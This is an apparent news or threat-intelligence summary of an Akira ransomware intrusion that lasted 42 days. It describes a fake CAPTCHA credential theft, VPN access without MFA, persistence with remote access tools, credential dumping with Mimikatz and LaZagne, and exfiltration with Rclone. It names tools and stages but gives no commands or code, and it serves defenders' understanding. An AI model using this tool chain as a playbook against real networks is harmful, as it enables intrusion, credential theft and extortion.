In a detailed incident response investigation, security researchers uncovered a sophisticated Akira ransomware attack that persisted within a victim’s network for 42 days. The initial point of entry was a deceptive fake CAPTCHA page, which successfully harvested user credentials. The threat actor leveraged these stolen credentials to access the organization’s VPN, an entry point that lacked multi-factor authentication (MFA).

Initial Access and Reconnaissance

Once inside the network, the attacker established persistence by installing legitimate remote access tools, including AnyDesk and RustDesk. This allowed them to maintain access and control over compromised systems. Following this, the actor began an extensive reconnaissance phase to understand the network topology and identify valuable targets. They employed tools like Advanced IP Scanner and SoftPerfect Network Scanner to map the internal network. To escalate privileges and move laterally to other systems, the attacker used well-known credential harvesting utilities such as Mimikatz and LaZagne to extract passwords and credentials from memory and system storage.

Data Exfiltration and Ransomware Deployment

After identifying and collecting sensitive data, the threat actor prepared it for extraction. The files were compressed and staged using the 7-Zip archiving tool. For the exfiltration process, the attacker used the command-line program Rclone to transfer the stolen data to a third-party cloud storage provider, completing the data theft objective. The entire operation, from initial compromise to final action, spanned a total of 42 days. The final stage of the attack involved the deployment of the Akira ransomware payload across the compromised network, encrypting critical files and systems to extort a ransom from the victim organization.